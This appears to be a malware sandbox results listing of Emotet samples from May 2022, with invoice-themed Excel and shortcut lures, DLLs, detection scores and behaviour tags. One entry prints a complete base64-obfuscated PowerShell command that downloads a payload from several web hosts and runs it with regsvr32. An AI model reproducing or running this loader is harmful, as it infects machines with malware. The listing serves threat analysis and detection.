=
We are hiring! Windows Kernel Developer (Remote), apply here!
flash

Result Threat Antivirus Icon Time & Date Name Info Class Graph Actions
malicious
Hidden Macro 4.0, Emotet
10%
2022-05-23 18:55:19 +02:00
allegati_23052022.xls
malicious
Hidden Macro 4.0, Emotet
65%
2022-05-23 11:36:06 +02:00
SecuriteInfo.com.Exploit.Siggen3.32567.15846.xls
malicious
Hidden Macro 4.0, Emotet
65%
2022-05-23 09:54:08 +02:00
Scan 2022.20.05_0910.xls
malicious
Emotet
41%
2022-05-23 09:53:07 +02:00
Details.lnk
malicious
Hidden Macro 4.0, Emotet
61%
2022-05-23 09:49:06 +02:00
Datei_26744565.xls
malicious
Hidden Macro 4.0, Emotet
59%
2022-05-23 09:03:14 +02:00
Rechnung.xls
malicious
Emotet
59%
2022-05-23 08:51:10 +02:00
Rechnungskorrektur 2022.20.05_1305.lnk
malicious
Hidden Macro 4.0, Emotet
61%
2022-05-23 08:51:09 +02:00
DETAILS 25922194612.xls
malicious
Emotet
41%
2022-05-23 08:47:09 +02:00
RechnungsDetails 2022.20.05_1044.lnk
malicious
Hidden Macro 4.0, Emotet
65%
2022-05-23 08:45:13 +02:00
RechnungsDetails.xls
malicious
Hidden Macro 4.0, Emotet
65%
2022-05-23 08:35:12 +02:00
Rechnungskorrektur.xls
malicious
Hidden Macro 4.0, Emotet
65%
2022-05-23 08:34:12 +02:00
Rechnung 2022.20.05_1440.xls
malicious
Hidden Macro 4.0, Emotet
59%
2022-05-23 08:25:05 +02:00
AGK-010522 MJEY-210522.xls
malicious
Hidden Macro 4.0, Emotet
59%
2022-05-23 08:20:10 +02:00
melimar.com.xls
malicious
Emotet
40%
no Icon
2022-05-23 04:10:44 +02:00
powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
malicious
Emotet
44%
2022-05-22 23:30:08 +02:00
3vYbe1bYFd.dll
malicious
Emotet
59%
2022-05-22 22:17:14 +02:00
W3XqCWvDWC.dll
malicious
Emotet
59%
2022-05-22 22:17:13 +02:00
JtJ50Swtfo.dll
malicious
Emotet
59%
2022-05-22 22:17:13 +02:00
nZNmWqwnpr.dll
malicious
Emotet
59%
2022-05-22 22:17:13 +02:00
qJhkILqiEA.dll
Windows:
InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files